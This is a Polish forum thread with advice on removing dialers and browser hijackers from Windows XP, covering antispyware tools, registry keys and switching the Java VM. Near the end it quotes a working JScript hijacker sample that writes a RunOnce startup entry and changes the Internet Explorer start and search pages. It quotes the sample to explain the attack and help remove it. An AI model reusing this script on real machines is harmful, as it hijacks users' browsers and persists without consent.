Dialer-jak zwalczać?

[Hegemmon]

Otóż komputer używam nie jest tylko mój... mam niezbyt inteligentnego brata, który buszuje po wszyskich stronkach i blogach... efektem tego są programy, które zmieniają stronę startową dodają linki do ulubionych albo wchodzą na stronę www same. Z ego co pamiętam to akie programy nazywają sięchyba Dialery( choć ręki nie dam sobie za to uciąć).
Moje pytanie brzmi:
Jak się tego pozbyć?
tylko szczegółowe opisy plz. Co i jak...
mam win XP jeśli to ma jakieś znaczenie.

[Magus]

Dialery to programiki przekierowujace polaczenie modemowe poprzez numer dostepowy TP lub Onet-konekt na inne - drozsze polaczenie. Od tego sa antydialery, niestety zadnej nazwy nie pamietam .

A z Twoim problemem....coz.... Najlepiej bedzie profilaktycznie postawic linuxa - to powinno skutecznie zniechecic brata do korzystania z kompa

A tak powazniej to o ile sie orientuje Mozilla ma opcje blokowania autootwierania stron i takie inne bajery, wiec moze po prostu zmien domyslna przegladarke. Reszcie problemow umiem zaradzic ale pod win 9.x.

[L..i..S..e..K]

CWShredder
Ad-aware 6.0
Spybot - Search & Destroy

Jak chcesz moge ci dac linki do nich.

Mysle ze wystarczy :

Edit:
)sytuacja : twoja przglądarka ma nową stronę startową i nową strone wyszukaj .
Za każdym, kiedy twoja przeglądarka ładuje nową stronę , strona nie pojawia się , zamykasz jakie dziwne strony , prawdopodobnie z okienkami pop-up .
Najpierw próbujesz zmienić ustawienia na stare : wchodzisz w IE do Narzędzia >>Opcje internetowe >>Ogólne - Strona główna i ustawiasz akceptując ok.

Możesz oczywiście próbować wejść do rejestru by przeszukać ustawienia , jednak wtedy pojawia się komunikat, że ''nie masz uprawnień administratora'' i nie możesz edytować rejestru, chodż było tak dotychczas . Niektórzy nieuczciwi webmasterzy po prostu zamieszczają złośliwe skrypty, by za ich pomocą zmienić ustawienia w twojej wyszukiwarce, czyniąc je potem niemożliwymi do odwrócenia .. "next to impossible".. .
W pierwszej kolejności należy oczywiście spróbować zastosować programy antispyware jak : - Spybot S&D
http://www.umich.edu/~hsw/spybotsd12*****
- Ad-aware
http://ftp.pcworld.com/pub/new/priva...urity/aaw6*****
- SpySweeper ,(trial)
http://www.spysweeper.com/cgi-bin/si...sfsetup347*****
- Pest Patrol ,(trial)
http://tracker.5star-network.com/dow...val*****&site=1
- Aluria Spyware Eliminator (trial)
http://download.com.com/3000-8022-10255386.html

Zakładając, że to programy nie rozwiązały problemu, powinieneś spróbować użyć HijackThis v.1.97
http://download.com.com/3001-8022-10227352.html
Dokładnie przyjrzeć się liście uruchamianych plików i możesz dokonać zmian i naprawy. Szczególy programu stronie : http://tomcoyote.com/hjt/

2)Potrzebujesz przywrócić ustawienia panelu kontrolnego IE.
(Nie dotyczy win 2000 i xp).
Znajdz plik o nazwie "control.ini" . Otwórz go w Notepad (jeden z najlepszych edytorów html) http://www.notepad.org/
Możesz znależć coś takiego jak :
[don't load]
inetcpl.cpl=yes
Skasuj "inetcpl.cpl=yes" ustawienie pod "[don't load]".
Zachowaj i zamknij po czym spróbuj panel kontrolny ponowie. Jesli nie zostaly zachowane zmiany zrestartul komputer , powinno zadziałać.
/W windows 2000-Xp Start >> edycja rejestru Regedit >> znajdż klucz :HKEY_CURRENT_USER\Control Panel\don't load\.
Znajdż czy inetcpl.cpl jest wymieniony .
Jesli jest, to skasuj ten wpis .
Zobacz liste nazw plikow w panelu kontrolnym : http://www.spywareinfo.com/articles/hijacked/#applets .

3). Znajdż na swoim dysku pliki kończące się na *.hta or *.js .
Jeśli znajdziesz, otwórz je w Notepad(podałem wyżej link ) albo innym edytorze tekstu i poszukaj URLs , ktore najprawdopodobniej są przyczyną przejęcia i zmiany ustawień.Każdy plik z tym URLs skasuj. Usuń także wszystkie pliki tymczasowe *.tmp , gdyż niektóre z nich zawierają złośliwe kody zmieniające ustawienia przeglądarki lub instalujące malware(trojany, robaki, dialery..) .
Poza tym kasowanie plików tymczasowych (*.tmp) nie jest szkodliwe w odróżnieniu od biblioteczek *dll, które mogą być czasem wymagane do użycia .

4). Sprawdz liste obiektów BHO na twojej przeglądarce bo to może mieć wpływ na jej działanie i ustawienia. Szczegóły oraz lista takich znanych obiektów znajduje się tu : http://www.spywareinfo.com/bhos/
.Jesli znajdziesz jeden z wymienionych obiektów ( spyware/malware/hijackware) , uruchom program HijackThis (podałem link)
i znajdz to BHO z listy po czym spróbuj naprawić z pomocą tego programu. Przed usunięciem obiektu BHO zrób jego kopie bo może się okazać,że on nie ma nic wspólnego z twoim problemem.

5) Teraz możesz zorientować się czy twój problem związany jest ze wpisami w startup - przy uruchamianiu ,czy po ponownym uruchomieniu komputera problem wraca.Zate czy dotyczy to wpisów w sekcji rozruchowej rejestru. Dokładnie przyjrzyj się liście wpisów jakie ujawnił HijackThis . Sprawdz te wpisy z listą Pacman`s List : http://www.pacs-portal.co.uk/startup_content.php
Wymienia sie tam pozycje jako wirusy,malware, spyware i inne niepożądane , cala baza http://www.sysinfo.org/startupinfo.php
Przeszukaj i jesli są to napraw problem.
Ważne . Żeby te zmiany zadziałały musisz zamnkąć wszystkie okna IE, czasem jest potrzebne wylogowanie czy ponowny rozruch windowsa żeby przyniosło oczekiwane efekty.

6) Wciąż są problemy?. Spróbuj oczywiście zawsze przeskanować swój sytem dobrym antywirusem , najlepiej kilkoma dobrymi i programem antytronajowym :trojan remover : http://www.simplysup.com/tremover/download.html.
trojan hunter : http://www.misec.net/products/TrojanHunter*****
TDS-3 : http://www.diamondcs.com.au/tds/downloads/tds3setup***** .
Możesz też przeskanować system cwshredder : http://download.freenet.de/archiv_c/...dder_5981.html
CoolWWWSearch.SmartKiller (v1/v2) : http://www.majorgeek.com/esselbachfp...a089e94b7b6b55
dalsze wskazówki zabezpieczenia się przed niekontrolowanym przechwyceniem twojej strony startowej w IE :
-upewnij się jaką masz u siebie zainstalowaną JRE (Wirtualna Maszyna Javy). Jest absolutnie niestandardowe i wysoce niebezpieczne dla bezpieczeństwa twojego systemu używanie javy od microsoftu MVM ( duże ryzyko podmienienia strony w IE poprzez zainstalowanie CoolWebSearch- szczególy na temat CoolWebSearch : http://www.spywareinfo.com/~merijn/c...tml#cwshredder ) . Pozbądż się javy microsoftu a na jej miejsce zainstaluj jave sun (JVM). Wirtualna Maszyna Javy swoimi apletami moze umożliwic dostep do dwojego komputera . Java suna (JVM) zapewnia wysoki poziom ochrony przed złośliwymi kodami. Odnośnik do suna : http://www.java.com:80/en/download/help/index.jsp .

Programy jeszcze do ochrony IE start page (freeware) win95-xp :

Browser Hijack Blaster v.1.0 : http://ftp.pcworld.com/pub/new/priva...astersetup*****

@Start Page 3.1 : http://www.soft411.com/company/Inter...Start-Page*****

CarHomePage 1.0 : http://www.soft411.com/company/XemiC...arHomePage*****

>>jeżeli wgraliśmy juz SUN jave -
jak zmienić ,by domyślną była SUN JVM (wirtualna maszyne javy) z używanej dotychczas Microsot VM :
start >panel sterowania >opcje internetowe >zakładka -zaawansowane >znależć wpis "Java (Sun)" i zaznaczyc okienko : "Use Java 2 v 1.4.x for applet (requires restart)" >następnie odznaczyc w okienku ''logowanie Microsoft VM'' >zachowac zmiany potwierdzjac ok. ,po czym ponownie zrestartować wyszukiwarke.Szczegóły na stronie SUN-a(również jak odwrócić ustawienia) : http://java.com/en/download/help/switchvm.jsp

Przykładem wyższego bezpieczeństwa javy SUN jeśli chodzi o jej podatność na złośliwe programy w sieci jest chodżby słabość javy Microsoft na takie szkodliwe programy jak :
Trojan.ByteVerify
VerifierBug.class
Java.JJBlack worm
Java.Shinwow trojan ,
programy, które lokalizują się w systemie w : ''C:\Documents and Settings\<username>\Application Data\Sun\Java\Deployment\cache\javapi\v1. 0\jar\ ''
Dotyczy to systemów Windows 98, ME, NT, 2000, XP, 2003. (szczegóły na stronie Microsoftu : http://www.microsoft.com/technet/tre...n/MS03-011.asp ) .
Jak podaje SUN, te programy wymienione wyżej '' nie mogą wyrządzić żadnych szkód twojemu komputerowi ponieważ zostały napisane na wirtualneą maszynę javy Microsoftu,nie zas SUN JVM ''.

Podam jeszcze program , który nie tylko,że w czasie rzeczywistym chroni przed szpiegami instalującymi się w naszym komputerze , ale również zawiera opcje zabezpieczenia naszej strony startowej w wyszukiwarce IE : SpywareGuard 2.2 ,bo o nim mowa jest freeware , win95-xp , link : http://www.javacoolsoftware.net/down...guardsetup*****

Innym programem, który może uchronić naszą przeglądarkę przed niekontrolowanym przejęciem za pośrednictwem kontrolek active X jest : SpywareBlaster 3.0 , jest rowniez freeware .
Program potrafi w wysokim stopniu uchronić przed instalacją na naszym systemie szpiegów podczas serfowania po internecie . Jak napisał jeden z uzytkownikow programu na jednym z vortali, zazwyczaj znajdywal u siebie po 20-30 szpiegów po intensywnym serfoawaniu za pomocą ad-aware, teraz znajduje u siebie ledwie 1,2 pozycje.
do pobrania link : http://www.javacoolsoftware.net/down...astersetup*****

Być może doświadczenia tej osoby pomogą jeszcze zdesperowanym (na własne ryzyko) :

''Sam niedawno miałem podobny przypadek. Po uruchomieniu IE ładowała się strona searchpage.cc. Kiedy przechodziłem do jakiejkolwiek wyszukiwarki, zawsze wyskakiwał searchpage.cc. W autostarcie nie było nic, ani w kluczach rejestru, ani w menu start.
W Temporary Internet Files znalazłem podejrzany elemet. Inst*****. Spakowany UPXem. Ponieważ nie miałem najmniejszego pojęcia jak hijacker uruchamia się z przeglądarką, rozpakowałem exe. Przy uzyciu edytora zasobów wyodrębniłem dwa binaria, z których jeden okazał się być biblioteką o nazwie mshelper.dll. Sprawdziłem katalog windows\system32. Była tam taka biblioteka, co więcej, jej usunięcie było niemożliwe, bowiem plik był używany przez system.
ProcessExplorer wszystko wyjaśnił.
Nie pozostało nic innego, jak poszukać w wyodrębnionych binariach ciągów będących kluczami rejestru. Bingo!
Pousuwałem wszystkie klucze związane ze swoim odkryciem. Po restarcie usunąłem felerną bibliotekę. Po problemie.
Usuwanie kluczy rozpoczęło się od HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions
Tak więc jeśli występuje tam jakiś wpis ewidentnie nie dotyczący używanego oprogramowania związanego z IE, np. FlashGet, warto go usunąć wyśledziwszy uprzednio powiązania tego klucza i innymi częściami rejestru (które najczęściej też można spokojnie usunąć).
Oczywiście, zanim zrobisz cokolwiek w rejestrze, najpierw wykonaj jego kopię zapasową!!!!. To na wszelki wypadek.
Inna możliwość: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search oraz HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main.
Tutaj często lokują się hijackery.

>>cd.
Jakże się dzisiaj mocno zdziwiłem, kiedy znów wyskoczyło mi searchpage.cc
He, spryciarze! W systemie pozostał jeszcze jeden plik, mtwirl.dll. A może pograny został z jakiejś strony?
..No w każdym razie odkryłem dziś (Ameryka!), że usuwanie kluczy z rejestru powinno zaczynac się od swojej działki, czyli HKCU. Potem HKLM. Poprzednio kompletnie zapomniałem o HKCU, więc dziś okazało się, że cały mój wysiłek poszedł na marne, bo wszystkie pozostawione wpisy zostały skopiowane do HKLM.
Hijackerom mówimy stanowcze NIE! Dlatego wszystko usunąłem, mtwirl.dll przywitał się z Koszem, a ZoneAlarm wzbogacił o nowe reguły blokujące dostęp do searchpage.cc i www.nkvd.us.
..Aha, jeszcze jedno. Warto sprawdzić klucz HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\URL i wpisy prefiksów. U mnie wszystkie prefixy zamienione były na www.nkvd.us/1526, co powodowało różne cuda ze stronami WWW. ''

Jeszcze kilka wskazówek odnośnie strony startowej :
''..Opisaną sytuację najczęściej powoduje krótki skrypt napisany w javie, np. : var url = "http://searchcentral.cc/index.php?v=4&aff=3615";
var burl = "http://searchcentral.cc/search.php?v=4&aff=3615";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update12.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows \\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

[L..i..S..e..K]

Powoduje on dopisanie do rejestru, konkretnie do klucza RunOnce polecenia uruchomienia przy starcie systemu siebie samego i zmianę strony startowej.
Dopóki nie usuniemy wpisu z klucza RunOnce, dotąd będzie podmieniana strona startowa. Wiele osób sprawdzając, co jest uruchamiane przy starcie zapomina o tym kluczu. Ten skrypt przy starcie systemu po prostu się wykona, więc nie zobaczymy go na liście aktywnych procesów.
Zabezpieczyć się przed czymś takim jest trudno. Jak go usuniemy, to zwykle i tak dość prędko znowu ściągniemy go sobie spowrotem ..''.
Należy zadbać o instalację wszystkich łat krytycznych zalecanych przez Microsoft. Dodatkowo warto zastosować jeden z programów, który chroni przez podmienieniem strony startowej a jesli już to nastąpi , może przywrócić poprzedni stan. Do listy podanych wyżej programów zabezpieczających przed przejęciem strony w wyszukiwarce dodam jeszcze program Win Patrol v.7, który zareaguje i zapyta nas w przypadku takiej zmiany ( kontroluje też zainstalowane obiekty BHO w IE) oraz pozwoli na przywrócenie poprzednich ustawień,do pobrania : http://www.winpatrol.com/wpsetup*****
Programy zabezpieczające przed przejęciem i zmianą strony startowej w IE wykaz :

-Npust Homepage Guard - It protects the IE Home page http://hotftp.hinet.net/files/apps/02apps/hguard*****
-Browser Hijack Blaster v.1.0 http://ftp.pcworld.com/pub/new/priva...astersetup*****
-SpywareGuard 2.2 http://www.javacoolsoftware.net/down...guardsetup*****
- SpywareBlaster 3.0 http://www.javacoolsoftware.net/down...astersetup*****
- Win Patrol v.7 http://www.winpatrol.com/wpsetup*****
- StartPage Guard http://www.snapfiles.com/download/dlstartpageguard.html
-@Start Page 3.1 http://www.soft411.com/company/Inter...Start-Page*****
-CarHomePage 1.0 http://www.soft411.com/company/XemiC...arHomePage*****

Zródło : www.CentrumXP.pl